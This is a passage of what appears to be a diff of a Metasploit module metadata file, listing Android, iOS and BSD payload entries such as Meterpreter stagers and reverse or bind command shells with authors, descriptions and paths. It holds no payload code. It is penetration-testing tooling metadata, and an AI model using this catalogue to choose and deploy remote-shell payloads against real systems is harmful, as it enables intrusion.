"session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/meterpreter", - "stager_refname": "android/reverse_http" - }, - "payload_android/meterpreter/reverse_https": { - "name": "Android Meterpreter, Android Reverse HTTPS Stager", - "fullname": "payload/android/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "anwarelmakrahy" - ], - "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_https.rb", - "is_install_path": true, - "ref_name": "android/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/meterpreter", - "stager_refname": "android/reverse_https" - }, - "payload_android/meterpreter/reverse_tcp": { - "name": "Android Meterpreter, Android Reverse TCP Stager", - "fullname": "payload/android/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Android.\n\nConnect back stager", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "android/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/meterpreter", - "stager_refname": "android/reverse_tcp" - }, - "payload_android/meterpreter_reverse_http": { - "name": "Android Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/android/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "android/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/meterpreter_reverse_https": { - "name": "Android Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/android/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "android/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/meterpreter_reverse_tcp": { - "name": "Android Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/android/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "android/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/shell/reverse_http": { - "name": "Command Shell, Android Reverse HTTP Stager", - "fullname": "payload/android/shell/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "anwarelmakrahy", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_http.rb", - "is_install_path": true, - "ref_name": "android/shell/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/shell", - "stager_refname": "android/reverse_http" - }, - "payload_android/shell/reverse_https": { - "name": "Command Shell, Android Reverse HTTPS Stager", - "fullname": "payload/android/shell/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "anwarelmakrahy", - "OJ Reeves" - ], - "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTPS", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_https.rb", - "is_install_path": true, - "ref_name": "android/shell/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/shell", - "stager_refname": "android/reverse_https" - }, - "payload_android/shell/reverse_tcp": { - "name": "Command Shell, Android Reverse TCP Stager", - "fullname": "payload/android/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt " - ], - "description": "Spawn a piped command shell (sh).\n\nConnect back stager", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "android/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "android/shell", - "stager_refname": "android/reverse_tcp" - }, - "payload_apple_ios/aarch64/meterpreter_reverse_http": { - "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", - "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/aarch64/meterpreter_reverse_https": { - "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/aarch64/meterpreter_reverse_tcp": { - "name": "Apple_iOS Meterpreter, Reverse TCP Inline", - "fullname": "payload/apple_ios/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/aarch64/shell_reverse_tcp": { - "name": "Apple iOS aarch64 Command Shell, Reverse TCP Inline", - "fullname": "payload/apple_ios/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Apple_iOS", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "apple_ios/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/armle/meterpreter_reverse_http": { - "name": "Apple_iOS Meterpreter, Reverse HTTP Inline", - "fullname": "payload/apple_ios/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "apple_ios/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/armle/meterpreter_reverse_https": { - "name": "Apple_iOS Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/apple_ios/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "apple_ios/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_apple_ios/armle/meterpreter_reverse_tcp": { - "name": "Apple_iOS Meterpreter, Reverse TCP Inline", - "fullname": "payload/apple_ios/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Apple_iOS", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "apple_ios/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/sparc/shell_bind_tcp": { - "name": "BSD Command Shell, Bind TCP Inline", - "fullname": "payload/bsd/sparc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/sparc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/sparc/shell_reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/sparc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/sparc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/vax/shell_reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/vax/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "wvu " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "vax", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/vax/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/exec": { - "name": "BSD x64 Execute Command", - "fullname": "payload/bsd/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/exec.rb", - "is_install_path": true, - "ref_name": "bsd/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_bind_ipv6_tcp": { - "name": "BSD x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/bsd/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Listen for a connection and spawn a command shell over IPv6", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_bind_tcp": { - "name": "BSD x64 Shell Bind TCP", - "fullname": "payload/bsd/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo ", - "joev " - ], - "description": "Bind an arbitrary command to an arbitrary port", - "references": [], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_bind_tcp_small": { - "name": "BSD x64 Command Shell, Bind TCP Inline", - "fullname": "payload/bsd/x64/shell_bind_tcp_small", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_bind_tcp_small", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_reverse_ipv6_tcp": { - "name": "BSD x64 Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/bsd/x64/shell_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Connect back to attacker and spawn a command shell over IPv6", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_reverse_tcp": { - "name": "BSD x64 Shell Reverse TCP", - "fullname": "payload/bsd/x64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "nemo ", - "joev " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x64/shell_reverse_tcp_small": { - "name": "BSD x64 Command Shell, Reverse TCP Inline", - "fullname": "payload/bsd/x64/shell_reverse_tcp_small", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Balazs Bucsay @xoreipeip " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c" - ], - "platform": "BSD", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb", - "is_install_path": true, - "ref_name": "bsd/x64/shell_reverse_tcp_small", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/exec": { - "name": "BSD Execute Command", - "fullname": "payload/bsd/x86/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "snagg ", - "argp ", - "joev " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/exec.rb", - "is_install_path": true, - "ref_name": "bsd/x86/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/metsvc_bind_tcp": { - "name": "FreeBSD Meterpreter Service, Bind TCP", - "fullname": "payload/bsd/x86/metsvc_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/metsvc_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/metsvc_reverse_tcp": { - "name": "FreeBSD Meterpreter Service, Reverse TCP Inline", - "fullname": "payload/bsd/x86/metsvc_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Stub payload for interacting with a Meterpreter Service", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/metsvc_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell/bind_ipv6_tcp": { - "name": "BSD Command Shell, Bind TCP Stager (IPv6)", - "fullname": "payload/bsd/x86/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/bind_ipv6_tcp" - }, - "payload_bsd/x86/shell/bind_tcp": { - "name": "BSD Command Shell, Bind TCP Stager", - "fullname": "payload/bsd/x86/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/bind_tcp" - }, - "payload_bsd/x86/shell/find_tag": { - "name": "BSD Command Shell, Find Tag Stager", - "fullname": "payload/bsd/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/find_tag.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/find_tag" - }, - "payload_bsd/x86/shell/reverse_ipv6_tcp": { - "name": "BSD Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/bsd/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/reverse_ipv6_tcp" - }, - "payload_bsd/x86/shell/reverse_tcp": { - "name": "BSD Command Shell, Reverse TCP Stager", - "fullname": "payload/bsd/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "bsd/x86/shell", - "stager_refname": "bsd/x86/reverse_tcp" - }, - "payload_bsd/x86/shell_bind_tcp": { - "name": "BSD Command Shell, Bind TCP Inline", - "fullname": "payload/bsd/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_bind_tcp_ipv6": { - "name": "BSD Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/bsd/x86/shell_bind_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "vlad902 ", - "hdm " - ], - "description": "Listen for a connection and spawn a command shell over IPv6", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_bind_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_find_port": { - "name": "BSD Command Shell, Find Port Inline", - "fullname": "payload/bsd/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "BSD", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb", - "is_install_path": true, - "ref_name": "bsd/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_bsd/x86/shell_find_tag": { - "name": "BSD Command 